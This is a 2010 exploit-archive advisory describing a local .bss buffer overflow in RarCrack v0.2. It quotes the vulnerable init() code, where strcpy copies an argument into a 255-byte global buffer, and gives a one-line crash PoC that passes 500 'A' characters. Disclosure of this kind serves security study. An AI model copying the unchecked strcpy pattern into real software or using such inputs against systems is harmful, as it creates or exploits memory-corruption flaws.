[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RarCrack v0.2 "filename" init() .bss PoC
# Published : 2010-09-20
# Author : Stoke
# Previous Title : MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption
# Next Title : Microsoft DRM Technology (msnetobj.dll) ActiveX Multiple Remote Vulnerabilities
The software can be downloaded here: http://rarcrack.sourceforge.net/
# Author: stoke
# Date: 2010-09-20
# Download: http://rarcrack.sourceforge.net/
# Tested on: Backtrack 4
#############################
Site: http://devilcode.it | http://hack2web.altervista.org
Special greetz to: nex, for reassure me when i sayed "WHY EIP IT'S NOT CHANGED!!!!!!!?!!!"
____ ___ __ __
/ _` __/_ /'__` /
/ __ __ __/_// ___ / / _ __ ___ _ __ __ __ __ __
/'__`\ / / \ /'___ /'_` /'__` /'___\`'__'__`\ / /
_ \ __/ _/ | \_ _/ __/ _ \ L / __/ / __/ / __/ _/ _/
____/ ____ ___/ _\____ ____\ ____/ ___,_ ____ ____ _ ____ ___x___/'
/___/ /____//__/ /_//____//____/ /___/ /__,_ //____/ /____//_//____//__//__/
Crew Members: bl3ck, stoke, Shellcoder_, n1md4, sys.x4sh, Ax3L, s1y, LostPassword, nex & overmind
############################
RarCrack v0.2 bss overflow PoC
###########################################
Function affected: init();
Type: local;
Variable overflowed: filename;
###########################################
########################################################
Here we have:
----- Start useful code snip --------
char filename[255];
----- End useful code snip ----------
This variable is above the "main" function, so is global and allocated on .bss.
In init() function we have:
---- Start useful code snip ----
if (strcmp(argv[i],"--help") == 0) {
printf("Usage: rarcrack encrypted_archive.ext [--threads NUM] [--type rar|zip|7z]nn");
printf("Options: --help: show this screen.n");
printf(" --type: you can specify the archive program, this needed whenn");
printf(" the program couldn't detect the proper file typen");
printf(" --threads: you can specify how many threadsn");
printf(" will be run, maximum 12 (default: 2)nn");
printf("Info: This program supports only RAR, ZIP and 7Z encrypted archives.n");
printf(" RarCrack! usually detects the archive type.nn");
help = 1;
break;
} else if (strcmp(argv[i],"--threads") == 0) {
if ((i + 1) < argc) {
sscanf(argv[++i], "%d", &threads);
if (threads < 1) threads = 1;
if (threads > 12) {
printf("INFO: number of threads adjusted to 12n");
threads = 12;
}
} else {
printf("ERROR: missing parameter for option: --threads!n");
help = 1;
}
} else if (strcmp(argv[i],"--type") == 0) {
if ((i + 1) < argc) {
sscanf(argv[++i], "%s", &test);
for (j = 0; strcmp(TYPE[j], "") != 0; j++) {
if (strcmp(TYPE[j], test) == 0) {
strcpy(finalcmd, CMD[j]);
archive_type = j;
break;
}
}
if (archive_type < 0) {
printf("WARNING: invalid parameter --type %s!n", argv[i]);
finalcmd[0] = '�';
}
} else {
printf("ERROR: missing parameter for option: --type!n");
help = 1;
}
} else {
strcpy((char*)&filename, argv[i]);
---- Stop useful code snip ----
How you can see, at the end of this code we have a strcpy to our "filename" variable, so, if you put more than 255 bytes in an argv, you will have a Segmentation Fault.
###########################################################################
###########################################################################
PoC
./rarcrack `perl -e 'print "A" x500'`
###########################################################################